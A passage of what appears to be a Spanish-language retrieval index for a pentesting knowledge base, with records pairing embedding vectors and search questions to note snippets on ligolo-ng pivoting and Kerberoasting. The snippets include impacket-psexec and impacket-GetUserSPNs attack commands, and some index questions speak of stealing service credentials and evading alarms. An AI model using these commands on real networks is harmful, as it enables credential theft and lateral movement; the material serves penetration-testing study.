-0.01824, -0.02781, -0.04496, 0.0112, -0.10827, -0.03644, 0.06307, -0.04949, -0.12969, -0.02907, -0.13781, -0.01249, 0.03077, -0.03777, -0.03651, 0.07119, 0.06259, 0.0012, -0.05112, -0.01508, 0.03961, 0.06436, -0.02964, -0.07356, 0.03146, -0.0689, 0.01124, -0.02138, -0.052, -0.08141, 0.06025, -0.02241, -0.02872, -0.01855, -0.02, 0.04862, -0.07914, -0.0017, -0.0417, 0.04971, 0.05318, -0.0632, 0.10036, -0.03147, -0.03635, -0.01605, -0.07355, -0.033, -0.007, -0.02452, -0.05886, -0.04366, 0.06004, -0.06323, -0.09809, 0.06569, -0.00819, 0.01546, -0.02533, 0.00425, 0.02144, -0.0368, 0.02914, 0.00924, -0.02358, 0.02408, 0.02945, -0.01871, -0.0213, -0.01896, -0.0209, -0.06175, 0.00748, 0.03992, -0.06497, 0.08691, 0.02561, -0.04348, 0.08435, -0.01899, 0.09298, 0.02937, -0.03564, 0.07502, -0.00978, -0.04412, -0.03506, 0.01425, -0.02693, 0.00373, -0.00351, 0.02683, 0.02615, 0.04596, -0.01052, 0.02953, 0.06175, 0.01891, -0.00742, 0.02146, -0.01744, 0.03748, 0.008, -0.0114, -0.04986, 0.01475, -0.0432, 0.01914, -0.0407, -0.02869, -0.00747, -0.03189, 0.06316, -0.01372, -0.04797, -0.01157, -0.07681, -0.1127, 0.04002, -0.0337, -0.05101, -0.05075, 0.03138, 0.07037, -0.05875, -0.01984, -0.00437]} -{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\n```bash\nimpacket-psexec admin@192.168.5.10 # el trΓ‘fico va por el tΓΊnel, transparente\n```\nAhora Movimiento lateral y Active Directory funcionan contra la red interna.\n\nRelacionado: Puesto de mando Kali Β· OSCP MOC", "indexar": "con quΓ© programa puedo moverme lateralmente dentro del Active Directory sin levantar alarmas", "v": [0.00644, 0.14556, -0.13221, -0.22616, -0.16872, 0.06367, -0.066, 0.11179, -0.24524, -0.05121, -0.05903, -0.1792, -0.00092, -0.03799, 0.0975, 0.02425, 0.09434, -0.09538, -0.04759, 0.02496, 0.03108, 0.04396, -0.01064, -0.07693, 0.08734, 0.08792, 0.05204, -0.01096, -0.05699, -0.13118, -0.05765, 0.0503, 0.16437, -0.0169, 0.11579, -0.05175, 0.01898, -0.0041, 0.11674, 0.05487, -0.09968, 0.03021, -0.1133, 0.07013, 0.04084, 0.08268, 0.03023, -0.14873, 0.11611, 0.03142, -0.05185, 0.02585, 0.07736, -0.12085, -0.00821, -0.01787, 0.01193, -0.04206, -0.04987, -0.12979, 0.02954, 0.05011, -0.03414, -0.00898, -0.03418, -0.06692, 0.09008, -0.02233, -0.07233, 0.00044, -0.02164, -0.04852, 0.03537, 0.14317, 0.00924, 0.04202, 0.01607, -0.10566, -0.04288, 0.04823, 0.01852, 0.07145, 0.04075, 0.0809, -0.05603, -0.11927, -0.00906, -0.05587, 0.00656, 0.02332, 0.12285, 0.05803, -0.04378, 0.06017, 0.04931, 0.0708, 0.02621, 0.0717, -0.01611, 0.06402, 0.08759, -0.05514, 0.03613, 0.07345, 0.01235, 0.00717, 0.01028, 0.04125, -0.02754, 0.02965, 0.00207, -0.03131, -0.01106, -0.05462, -0.06743, 0.08783, -0.1479, 0.00869, 0.01128, 0.03014, 0.005, -0.05309, 0.06905, -0.00898, 0.02493, -0.03565, 0.02514, 0.10039, -0.02511, 0.12371, 0.05887, 0.01652, 0.06414, -0.14495, -0.0453, -0.07739, 0.03533, 0.04754, 0.08478, -0.08069, 0.00094, 0.04567, 0.03682, 0.00525, -0.00586, 0.01254, 0.04173, 0.0354, -0.00023, 0.005, 0.01748, 0.01404, 0.05909, 0.01797, 0.042, 0.04785, 0.0155, -0.00979, -0.10567, 0.0237, -0.02099, 0.02176, -0.0366, -0.07878, -0.01215, -0.06269, -0.03481, 0.02376, 0.04998, 0.12243, -0.0448, 0.03337, 0.06298, -0.06388, 0.01493, -0.02569, -0.07381, -0.01373, 0.06252, -0.02188, -0.04287, 0.03922, 0.07467, -0.0124, 0.02105, -0.0275, -0.03254, -0.02802, -0.01688, 0.02554, -0.0285, 0.04928, -0.05116, -0.02234, -0.03687, -0.04549, 0.02186, -0.03245, 0.04843, -0.0286, -0.07146, -0.02679, 0.04116, 0.00633, 0.09426, 0.05591, -0.0221, 0.07359, 0.08167, 0.05322, -0.02287, -0.01539, 0.07148, 0.02836, -0.05303, 0.02311, -0.08153, 0.04541, -0.03473, 0.01938, -0.01567, 0.0049, 0.03085, -0.0116, -0.01149, -0.02702, -0.00244, 0.03579, -0.00277, 0.04966, -0.00216, -0.05215, 0.01792, 0.03226, -0.00819, -0.01615, 0.00823, -0.0409, 0.01823, -0.02891, -0.03088, 0.01907, 0.05406, -0.03332, -0.06859, -0.01848, 0.00494, 0.02485, -0.00484, 0.02116, 0.00724, 0.01046, -0.00789, -0.08421, 0.04472, 0.06844]} -{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\n```bash\nimpacket-psexec admin@192.168.5.10 # el trΓ‘fico va por el tΓΊnel, transparente\n```\nAhora Movimiento lateral y Active Directory funcionan contra la red interna.\n\nRelacionado: Puesto de mando Kali Β· OSCP MOC", "indexar": "cual es una alternativa libre a impacket-psexec para hacer movimiento lateral", "v": [-0.14001, -0.0111, -0.19916, -0.04908, -0.2169, -0.08055, -0.0015, 0.0454, -0.10373, -0.03978, -0.04083, -0.09293, -0.04293, 0.05634, 0.11372, -0.00458, 0.03337, 0.02313, 0.08117, -0.07661, -0.11965, -0.01034, -0.09976, -0.08166, 0.09711, 0.03295, 0.0247, 0.0443, -0.11321, -0.02782, -0.10378, 0.03491, 0.05597, -0.05819, 0.05756, -0.0762, 0.14401, -0.02811, 0.11456, -0.00415, -0.07014, -0.05026, -0.17223, 0.08242, -0.11514, 0.00092, -0.07607, 0.06959, 0.03884, -0.03467, 0.03535, 0.03974, -0.0391, -0.00852, 0.07081, 0.04315, 0.16307, -0.1059, -0.05842, -0.05513, 0.03565, 0.14778, 0.02615, -0.02713, 0.03702, -0.02018, -0.01051, -0.07281, -0.05139, -0.03091, 0.06658, -9e-05, -0.03396, 0.01817, -0.15002, 0.09842, -0.01636, -0.04596, -0.03985, 0.1042, 0.02599, 0.04603, -0.0608, 0.02742, -0.02813, -0.06273, 0.06267, -0.1008, 0.07725, 0.07546, 0.12738, 0.04181, -0.07625, 0.1087, -0.04168, 0.00303, -0.07862, 0.04197, -0.07518, 0.00967, 0.06772, 0.03034, -0.13379, -0.07005, 0.02993, -0.13773, 0.00215, 0.06685, -0.06872, 0.06609, 0.06398, 0.02097, -0.00735, 0.03808, 0.03994, -0.0517, -0.11001, 0.02651, -0.06663, 0.03456, 0.03889, -0.0163, -0.06669, -0.15368, 0.00628, -0.00514, 0.06981, 0.05889, -0.05776, 0.0327, 0.08885, -0.04962, -0.03574, -0.10177, -0.08846, -0.05838, 0.08663, 0.07766, 0.03614, 0.00356, 0.03708, -0.00785, -0.00597, 0.01922, 0.01349, 0.04264, 0.05648, 0.04246, -0.01702, 0.02573, -0.0468, -0.0213, 0.02341, 0.07549, -0.01193, 0.04334, -0.08098, -0.04211, -0.08883, 0.03206, 0.02963, 0.04055, -0.02854, -0.01037, -0.01302, -0.02734, 0.01916, 0.02291, -0.05681, 0.02766, -0.0004, 0.02801, 0.09764, -0.02347, 0.0457, -0.0387, -0.04814, -0.08425, 0.10281, -0.04185, 0.03457, 0.05542, -0.0105, -0.01374, 0.07935, -0.06123, 0.04788, -0.00103, 0.02555, 0.07073, -0.03743, 0.03642, -0.02816, -0.11075, -0.02438, -0.04797, 0.00556, -0.067, 0.05737, 0.03407, -0.07105, -0.04971, 0.02486, -0.01362, -0.02523, -0.00411, -0.05319, 0.04969, 0.03727, 0.02711, 0.04395, -0.00805, 0.1103, 0.01163, -0.08687, 0.02793, -0.00856, -0.00171, -0.04146, 0.018, 0.02689, -0.02158, 0.01216, 0.01318, 0.01848, 0.03603, 0.05267, 0.04021, -0.03245, 0.00149, 0.03732, 0.05286, -0.02474, 0.00937, 0.02712, 0.04407, 0.06462, 0.01666, -0.03227, -0.00265, 0.04375, 0.03289, -0.06178, 0.01073, -0.01126, 0.00413, -0.0539, 0.06679, -0.00024, -0.03545, 0.01474, 0.02362, -0.00549, -0.00885, 0.06828, 0.07698]} -{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kerberoasting\n\n> Pides el **TGS** de cuentas de servicio (las que tienen **SPN**) y crackeas su hash offline. Uno de los 7 caminos de Active Directory.", "indexar": "que tecnica sirve para obtener hashes de cuentas de servicio?", "v": [0.1351, 0.00584, -0.13624, -0.11782, 0.12367, -0.22039, -0.06172, -0.09294, 0.01631, 0.08448, -0.23348, -0.0275, -0.01738, 0.00828, 0.09529, 0.02352, 0.10464, -0.03871, 0.08181, 0.01268, 0.03213, -0.00218, -0.14383, -0.0015, -0.10943, -0.05383, 0.05245, -0.08488, -0.25023, 0.05417, 0.07312, -0.07011, -0.07891, 0.04871, -0.01335, 0.06263, -0.06753, 0.08687, 0.05165, 0.04899, -0.01902, 0.00774, -0.01979, 0.06018, 0.1003, -0.12178, 0.0163, 0.11678, -0.01481, 0.0392, 0.07125, -0.02735, -0.2081, 0.02677, -0.16238, -0.06705, 0.0093, -0.02598, -0.1774, -0.06364, -0.04287, -0.09155, 0.07059, -0.00219, 0.02129, -0.06766, 0.03922, 0.01138, 0.00961, -0.00691, -0.1199, 0.11255, 0.00812, 6e-05, -0.08889, -0.03303, -0.0211, -0.0557, -0.03823, -0.03386, 0.03276, -0.07127, -0.06704, -0.00333, -0.07599, -0.03641, 0.00687, -0.04092, 0.11351, -0.05457, 0.03273, 0.04409, -0.04233, 0.04691, -0.01841, 0.11558, 0.03958, 0.00355, -0.02589, -0.03086, 0.0498, 0.00267, -0.11278, 0.05853, -0.06066, 0.09969, 0.12251, -0.10568, 0.04656, -0.04763, 0.01514, -0.00278, -0.08115, 0.0387, -0.06873, -0.00084, -0.04927, 0.00162, -0.00417, 0.07233, -0.01194, -0.03409, 0.09191, 0.0794, 0.0099, -0.08221, -0.04765, 0.00016, 0.05434, 0.00524, 0.0118, -0.02432, -0.06444, 0.02895, 0.053, 0.00661, 0.04505, -0.05487, -0.04536, -0.01454, 0.02146, 0.09633, -0.05931, -0.11139, 0.04283, -0.02151, 0.08606, -0.07043, -0.03996, -0.01994, 0.07212, -0.07408, -0.06745, 0.07425, -0.06863, -0.05892, 0.02325, -0.07219, -0.09531, 0.06952, -0.04457, -0.03319, 0.03304, 0.02061, -0.02269, -0.04731, -0.00384, -0.00143, 0.08388, -0.00517, -0.0682, 0.00552, -0.0145, -0.04237, 0.01347, -0.01942, -0.06967, -0.02673, -0.0319, -0.01047, -0.06682, -0.07767, 0.03849, -0.03519, 0.00119, -0.00947, -0.00157, -0.0136, 0.04343, -0.03724, -0.00423, -0.03306, -0.08528, 0.0377, -0.03377, -0.01982, 0.00262, 0.0072, 0.01679, -0.08863, -0.01654, 0.07368, -0.01056, 0.02798, 0.00424, 0.05592, 0.00441, -0.00439, -0.05342, 0.00245, 0.02515, -0.01658, 0.04584, -0.05737, -0.02453, 0.00145, 0.03325, -0.05091, 0.01458, 0.06763, -0.02393, -0.05349, -7e-05, 0.00649, 0.00626, 0.01407, 0.03566, 0.00292, 0.02612, 0.0164, -0.00239, 0.04805, -0.03642, 0.03187, -0.01101, -0.01143, 0.04538, -0.00445, 0.00313, -0.04875, 0.01021, 0.04492, -0.01188, -0.01806, -0.02411, -0.02198, -0.06589, -0.00498, -0.02435, -0.0502, 0.01454, 0.01888, 0.03127, 0.02618, 0.04973, -0.02796]} -{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kerberoasting\n\n> Pides el **TGS** de cuentas de servicio (las que tienen **SPN**) y crackeas su hash offline. Uno de los 7 caminos de Active Directory.", "indexar": "con que puedo robar credenciales de servicios activos directorio?", "v": [0.14029, -0.06021, -0.03099, -0.06642, 0.07289, 0.01151, 0.1684, 0.10518, -0.12424, -0.04601, -0.04536, -0.22471, 0.0822, -0.11375, 0.17272, 0.01303, -0.05891, 0.02974, -0.01881, 0.02938, 0.04444, -0.02903, -0.0603, 0.04912, 0.06897, 0.02348, -0.0244, -0.01893, -0.04322, 0.16088, 0.03907, -0.09021, 0.10423, -0.04911, -0.02285, 0.03083, -0.03688, -0.01441, 0.00145, 0.1757, 0.05062, -0.00396, -0.05548, -0.04445, 0.11853, 0.00871, -0.05577, -0.10117, -0.02122, 0.06858, 0.04865, -0.17759, -0.10977, -0.119, -0.01005, 0.03024, 0.05303, 0.0049, 0.02212, -0.12008, -0.06532, 0.06579, -0.03498, 0.04917, 0.08227, -0.07405, 0.09016, -0.0502, -0.02648, 0.06792, -0.07384, 0.08213, -0.00567, 0.13379, -0.00873, -0.06538, 0.04527, -0.09907, -0.1039, 0.13627, -0.03435, 0.02974, 0.01087, 0.06122, -0.08083, -0.1352, 0.04451, -0.05117, 0.04411, -0.05231, 0.08598, 0.09181, -0.09285, 0.06019, -0.12939, 0.10217, -0.03821, 0.04443, -0.0504, -0.02793, 0.03502, 0.02254, -0.11412, 0.15596, 0.03269, 0.03912, -0.00904, 0.09608, -0.0235, -0.07671, -0.03564, -0.03803, 0.04034, -0.05282, 0.04912, 0.13777, -0.10088, -0.00944, 0.01862, 0.0246, 0.07879, -0.13483, 0.04249, 0.03894, 0.04623, -0.02462, 0.03716, 0.06681, -0.04831, -0.06804, -0.01071, 0.02426, 0.01121, -0.02216, 0.01512, -0.0393, 0.00837, -0.03705, -0.03895, -0.01143, -0.00221, 0.00925, 0.01834, 0.03728, 0.01823, -0.01956, 0.04772, -0.04598, 0.04351, -0.09788, 0.03021, 0.03415, -0.08761, -0.01273, 0.02327, 0.0321, 0.12506, -0.07855, -0.0525, 0.02991, -0.00771, -0.00325, 0.00419, 0.03597, -0.12134, -0.02205, 0.04996, 0.03196, -0.00337, -0.02444, -0.01948, -0.00217, 0.02287, -0.10393, 0.01445, 0.04725, 0.03038, -0.01579, 0.0706, -0.06091, -0.00243, 0.01684, 0.0138, 0.0165, -0.05471, 0.03449, 0.01271, 0.00828, -0.03839, -0.06634, 0.04055, -0.02939, -0.02837, 0.05596, 0.04958, -0.03274, -0.01261, 0.04742, -0.02344, -0.02703, -0.01136, 0.04822, -0.03105, 0.00724, 0.04025, -0.00976, 0.03888, 0.05627, -0.02911, -0.0013, 0.04691, 0.04556, 0.13184, -0.07263, -0.04909, 0.00702, -0.0061, 0.06701, -0.05164, -0.0414, -0.02929, -0.03931, 0.00311, -0.01377, 0.02692, -0.00444, -0.03286, -0.02981, 0.01192, 0.03545, -0.00203, -0.01486, -0.07196, -0.05495, 0.01861, -0.01614, 0.00425, 0.00193, 0.06697, -0.00679, -0.04925, 0.06444, -0.02681, -0.03766, -0.04464, 0.0604, -0.0157, 0.01622, 0.00163, -0.0292, 0.05695, 0.0297, -0.00846, -0.038, -0.00636, -0.04369]} -{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kerberoasting\n\n> Pides el **TGS** de cuentas de servicio (las que tienen **SPN**) y crackeas su hash offline. Uno de los 7 caminos de Active Directory.", "indexar": "cual es una alternativa libre a Kerberoasting para cracar hashes?", "v": [-0.01588, -0.172, 0.05483, 0.12947, -0.06189, -0.21257, -0.00521, 0.19299, -0.08168, -0.00922, -0.14125, -0.17407, -0.05321, -0.04373, 0.24232, 0.03752, -0.11322, 0.03555, 0.1315, 0.062, -0.0474, 0.03622, -0.14603, -0.00346, -0.15813, -0.08492, -0.12301, 0.05409, -0.19315, 0.06609, -0.02903, 0.02774, 0.01322, 0.10121, -0.02767, 0.10032, 0.00503, 0.09101, 0.0944, 0.04414, -0.02094, -0.04223, 0.04662, 0.10003, 0.00237, -0.12163, -0.08028, 0.04654, -0.01988, 0.04627, 0.04344, -0.06296, -0.13922, 0.00489, 0.12808, -0.05437, 0.05001, -0.10508, -0.17761, -0.04139, -0.02346, 0.07853, -0.00963, -0.01752, -0.04376, -0.10074, -0.03217, -0.00894, -0.04318, 0.0261, 0.08787, 0.05411, 0.09317, -0.02156, -0.02066, 0.16215, -0.07262, -0.00098, 0.02635, 0.03873, 0.05398, -0.12348, 0.05807, 0.08147, -0.04984, -0.03828, 0.11512, -0.08771, 0.04564, 0.09244, 0.03751, 0.07012, -0.03682, 0.12384, -0.01026, -0.08011, -0.06973, 0.09963, 0.00044, 0.0175, -0.02857, 0.02439, -0.11983, 0.00174, -0.04706, -0.03475, -0.03762, 0.07882, -0.01309, -0.01775, 0.09003, 0.05967, -0.00644, 0.00676, -0.03932, 0.01422, -0.02059, 0.06485, 0.02542, 0.03883, -0.05375, 0.00427, 0.01205, -0.06486, 0.04181, 0.01324, 0.02898, 0.03346, -0.06952, 0.02041, 0.08398, 0.01253, -0.05653, -0.06073, -0.05016, 0.00285, 0.04984, -0.0322, 0.03234, -0.00343, 0.01058, 0.04412, -0.00356, -0.02695, 0.03984, -0.04181, -0.00864, 0.02339, 0.04057, -0.0391, -0.06314, 0.0235, -0.00774, 0.07322, -0.00488, -0.02576, -0.06021, -0.00128, -0.02153, 0.06583, 0.00502, -0.09195, 0.04759, 0.04018, -0.00753, -0.00082, 0.03768, -0.02446, -0.0706, 0.01113, 0.0293, 0.01101, 0.06928, -0.01406, 0.03948, -0.04331, 0.0534, -0.0251, -0.04378, -0.04153, 0.05685, -0.02972, -0.02595, -0.00598, 0.00983, -0.05159, 0.03808, 0.04234, 0.01138, -0.02484, -0.02226, -0.00563, -0.06077, -0.02204, 0.0264, 0.04263, 0.04495, -0.08232, -0.02387, -0.03018, -0.07526, -0.00855, 0.00166, -0.02931, 0.00866, 0.00806, -0.03155, -0.00693, 0.01572, 0.02612, 0.03244, 0.00104, 0.04562, 0.0231, -0.06149, 0.00331, 0.00256, -0.00891, -0.01204, -0.03147, 0.03254, 0.04998, 0.02931, 0.01167, -0.03149, 0.04465, 0.02167, 0.08565, -0.02813, 0.00718, 0.01156, -0.01515, -0.0186, 0.03074, 0.01228, -0.01443, -0.0124, 0.05143, 0.04295, 0.00559, 0.04186, 0.04808, -0.00597, 0.03813, -0.00624, -0.02394, -0.05929, 0.01006, -0.00885, 0.01201, 0.00151, 0.02526, -0.01962, 0.00307, 0.00953, 0.02207]} -{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Ataque\n```bash\nimpacket-GetUserSPNs dominio/usuario:password -dc-ip IP -request", "indexar": "que programa puedo usar para recuperar los Service Principals de un usuario en una red", "v": [-0.00284, 0.06665, -0.13488, -0.20694, 0.00106, -0.08946, -0.03215, -0.08665, -0.01199, -0.11021, -0.11346, -0.13566, -0.06571, -0.06714, -0.06058, -0.05531, 0.01378, 0.01398, 0.09291, 0.06185, 0.03408, -0.02059, -0.02576, 0.00308, 0.03599, 0.18475, 0.13121, -0.12746, 0.03276, 0.03478, 0.00265, 0.01713, -0.00095, -0.13029, -0.11575, -0.01053, 0.04996, 0.05136, 0.02764, 0.10945, 0.09242, 0.04371, -0.09872, 0.07125, 0.10247, 0.06794, 0.07285, -0.10593, -0.07422, -0.0165, 0.03023, -0.16776, -0.17911, -0.13661, 0.05109, -0.09858, -0.02921, -0.12397, -0.15988, -0.05449, -0.00532, -0.01188, 0.05707, 0.09331, 0.05565, -0.15313, 0.03049, 0.02595, -0.08199, 0.11511, -0.00852, 0.05836, 0.01417, -0.02038, 0.04069, 0.05765, 0.00827, -0.05379, 0.10789, -0.00308, -0.05369, 0.01828, 0.00819, 0.01935, -0.07588, -0.09806, 0.06329, -0.0258, -0.01505, -0.05901, 0.03852, 0.00874, 0.02601, 0.00325, 0.07116, -0.06315, 0.05534, 0.03224, -0.04666, 0.02027, 0.07554, -0.03371, -0.01088, 0.0831, -0.01595, 0.01473, 0.09959, -0.05345, -0.02363, 0.01669, -0.01756, -0.08993, -0.03393, -0.03071, -0.12187, 0.07451, -0.01675, -0.01034, -0.00661, -0.058, -0.01759, 0.02101, 0.05572, -0.01841, 0.11241, -0.02325, 0.02393, 0.05066, -0.08036, -0.0009, -0.0378, 0.06815, -0.02651, -0.06046, -0.05215, -0.01037, 0.00879, 0.00217, 0.03957, 0.03241, 0.01947, 0.10394, -0.0324, 0.00585, 0.03984, 0.03467, 0.09463, -0.07863, -0.04216, 0.00408, 0.05808, 0.02692, -0.04169, -0.00751, -0.08833, 0.02475, 0.02211, -0.0616, -0.08875, 0.03986, -0.08274, -0.05457, 0.02993, -0.00973, 0.08877, -0.0686, 0.01133, 0.02173, 0.10759, 0.03962, -0.00346, 0.06997, -0.02443, -0.09432, 0.01522, -0.00819, -0.03087, -0.09515, 0.02739, -0.04041, 0.00963, -0.03703, 0.03683, -0.0103, -0.01883, -0.06074, -0.05578, 0.0388, -0.02529, -0.03748, -0.03559, -0.01667, 0.03492, 0.03085, 0.04578, -0.00458, -0.03884, 0.05404, -0.01238, -0.06511, -0.11804, 0.04308, -0.00963, 0.02206, 0.0978, -0.02261, -0.03336, 0.03991, 0.04759, 0.08715, -0.0223, -0.00297, 0.07655, 0.02813, -0.06062, -0.02063, 0.033, 0.02294, 0.00376, -0.01728, 0.05108, 0.00257, -0.01114, 0.10395, -0.00369, -0.09494, 0.04638, -0.03051, 0.01145, 0.02453, 0.00083, -0.02852, -0.03871, -0.02363, -0.00971, -0.04405, 0.04278, -0.02266, 0.01308, -0.0314, -0.03076, 0.14678, -0.02944, 0.00893, 0.02577, -0.02621, -0.07803, 0.02532, 0.00439, -0.01081, 0.00525, 0.07778, 0.07321, -0.075, 0.01965, 0.02812]} -{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Ataque\n```bash\nimpacket-GetUserSPNs dominio/usuario:password -dc-ip IP -request", "indexar": "cual es una alternativa libre a impacket para obtener SPNs", "v": [-0.099, -0.06316, -0.1453, 0.00409, -0.02285, -0.17031, 0.02595, -0.23033, -0.20674, 0.04753, -0.10151, -0.0508, 0.03652, -0.08626, -0.09139, 0.08755, -0.07027, -0.09678, 0.15491, 0.13562, -0.14641, 0.03979, -0.11485, -0.09233, 0.02648, 0.06885, 0.07571, 0.15075, -0.07673, 0.07245, -0.0056, -0.01256, -0.00473, -0.0115, -0.00572, -0.03904, 0.16693, 0.1496, 0.18662, -0.04926, 0.05238, -0.02506, -0.04422, 0.08181, -0.08864, -0.02395, -0.08081, 0.09724, -0.00956, -0.01841, -0.01113, 0.07655, -0.10228, 0.00291, 0.03114, -0.00538, 0.0992, -0.0777, -0.07705, 0.05003, -0.03926, 0.08631, -0.00413, -0.05455, 0.04701, -0.0356, -0.02699, 0.02562, -0.11934, -0.00162, 0.07439, -0.0348, 0.06723, -0.0337, -0.11944, 0.06948, -0.09382, -0.01257, 0.01894, 0.10348, 0.11137, -0.0742, -0.01625, 0.04089, -0.06292, -0.07027, 0.05765, -0.07294, 0.05694, 0.00734, 0.01432, 0.01669, -0.04336, 0.1146, 0.0201, -0.09415, 0.01424, 0.01753, -0.0098, 0.00788, 0.00954, -0.00187, -0.11513, -0.04584, -0.04876, -0.09114, -0.01871, 0.08552, -0.0587, 0.08425, 0.07237, 0.06825, 0.05315, 0.07998, 0.00512, -0.04274, -0.01768, -0.03383, 0.00909, -0.03226, -0.03625, -0.02232, -0.07338, -0.08913, 0.03783, 0.03848, 0.10266, -0.00174, -0.00945, 0.03765, 0.03582, -0.02013, -0.01876, -0.10041, -0.06524, -0.09924, 0.07137, -0.05607, -0.00611, 0.05041, -0.01175, -0.04234, 0.00859, 0.01197, -0.00037, -0.06277, 0.00204, -0.0056, 0.02943, -0.0356, 0.01305, 0.02281, -0.01789, 0.07504, -0.00322, 0.01578, -0.05961, -0.06091, -0.06048, 0.10161, 0.02509, -0.06517, 0.02924, 0.03167, 0.02171, -0.02863, 0.00431, -0.0475, -0.08321, 0.0203, -0.0012, 0.02576, 0.07566, -0.04789, -0.00136, -0.10474, -0.0225, -0.06932, 0.03891, -0.06678, -0.00584, 0.0562, -0.08122, -0.00566, 0.00121, -0.05029, 0.05848, -0.01976, -0.00798, -0.02452, -0.01192, 0.04239, -0.01668, -0.07284, -0.03658, 0.01891, 0.05847, -0.08859, -0.01797, -0.00024, -0.0725, -0.00091, -0.04206, -0.05249, -0.02533, -0.01249, -0.03427, 0.03611, 0.02746, 0.04837, 0.07267, 7e-05, 0.07376, -0.0259, -0.07715, 0.00335, -0.00982, 0.02982, 0.00971, 0.00269, 0.01181, 0.00645, -0.00924, -3e-05, -0.01982, -0.00165, -0.01761, 0.08652, -0.04048, -0.01379, 0.01524, 0.01737, -0.00331, 0.04994, 0.0509, 0.04016, 0.00586, 0.03674, 0.04987, 0.06389, 0.00759, 0.02552, -0.05144, -0.00277, 0.00941, 0.04615, -0.06029, -0.03482, -0.04677, -0.02486, -0.01106, 0.03217, -0.00715, 0.03443, 0.00689, 0.05025]} -{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Ataque\n```bash\nimpacket-GetUserSPNs dominio/usuario:password -dc-ip IP -request", "indexar": "con que herramienta puedo ejecutar comandos bash directamente como root o con permisos elevados", "v": [0.17085, 0.07565, -0.09392, -0.15446, 0.05317, -0.05447, 0.0239, -0.02789, -0.05946, -0.08716, -0.13341, 0.02485, 0.1289, -0.05469, 0.07867, 0.0485, 0.0414, 0.04661, -0.1228, -0.03546, 0.07718, -0.07613, -0.06168, 0.03059, 0.006, 0.05255, 0.10968, 0.08171, -0.19267, -0.00607, -0.02768, 0.03265, 0.06567, -0.03506, -0.0419, -0.00091, -0.09639, 0.08119, -0.02176, 0.10842, -0.11298, 0.05777, -0.16958, 0.09717, 0.0045, -0.09509, -0.01841, -0.00178, 0.06313, -0.10616, 0.01698, -0.19505, -0.1516, -0.04017, -0.04912, -0.06923, 0.19803, -0.15541, -0.06261, 0.01299, -0.11487, -0.07504, 0.04348, 0.05341, -0.01031, 0.02702, 0.03289, -0.15827, -0.01157, 0.11759, -0.07795, 0.10466, -0.00258, 0.09427, 0.08013, -0.04, -0.08163, -0.02629, 0.06727, -0.0024, 0.02659, -0.01776, -0.07856, -0.00562, -0.05318, -0.12844, -0.10311, -0.06396, -0.00743, -0.0314, 0.00234, 0.01975, -0.02397, -0.00311, 0.09548, 0.03439, 0.00669, -0.02782, -0.05835, 0.0287, 0.08029, -0.01017, -0.04959, 0.14827, 0.04944, -0.00846, 0.04067, -0.03376, -0.01331, 0.05309, 0.0471, -0.03112, 0.05522, -0.01319, -0.03485, -0.0359, -0.09205, -0.06641, -0.03648, -0.07184, -0.04593, -0.01163, -0.00752, 0.04482, -0.01417, -0.03847, -0.082, 0.13005, -0.00628, -0.05502, -0.01487, -0.0503, 0.13651, 0.00148, -0.06987, 0.08533, -0.00038, -0.07045, -0.06615, -0.12295, 0.00525, 0.04247, 0.03544, -0.03431, 0.06381, 0.01222, -0.05237, -0.0429, -0.02265, -0.07072, 0.05282, -0.02543, -0.04022, 0.08011, -0.06647, -0.00641, -0.07133, 0.02044, -0.03049, 0.07987, -0.03273, -0.07282, -0.09482, 0.04811, 0.00505, -0.00826, 0.00822, 0.00403, -0.00668, 0.09483, -0.02693, 0.02951, 0.02266, -0.03128, 0.04678, -0.05805, -0.01154, -0.02639, 0.02696, -0.01232, 0.00691, 0.02497, -0.03759, -0.06909, 0.01115, -0.02066, 0.03112, 0.02046, 0.02829, 0.02002, -0.04236, 0.10888, 0.04424, -0.04523, 0.0376, 0.04502, 0.02746, -0.00528, -0.06631, -0.00017, -0.02138, 0.03503, 0.01397, -0.06574, 0.06008, -0.02061, -0.00354, 0.03707, -0.03178, 0.01607, -0.04171, 0.0095, 0.06556, 0.00655, -0.01961, -0.03034, -0.01637, 0.01137, -0.00652, -0.04143, 0.02083, 0.03005, 0.11465, -0.02173, 0.02046, -0.03109, 0.01393, -0.04583, 0.003, 0.03097, 0.00582, -0.02173, -0.03114, -0.01909, 0.02469, -0.02601, -0.00231, 0.01405, -0.01534, 0.01461, -0.0113, 0.0335, 0.03375, -0.06092, -0.02398, -0.02934, -0.0357, -0.03538, -0.03212, -0.05274, 0.02698, 0.04941, 0.02716, -0.05128, -0.02443, -0.05815]} -{"tipo": "pregunta", "herramienta": "Kerberoasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberoasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© funciona\nEl TGS va cifrado con el hash de la cuenta de servicio (Kerberos). Si su password es dΓ©bil β†’ crackeo β†’ credencial nueva β†’ Movimiento lateral.\n\nRelacionado: Cracking de contraseΓ±as Β· AS-REP Roasting Β· Impacket Β· BloodHound Β· 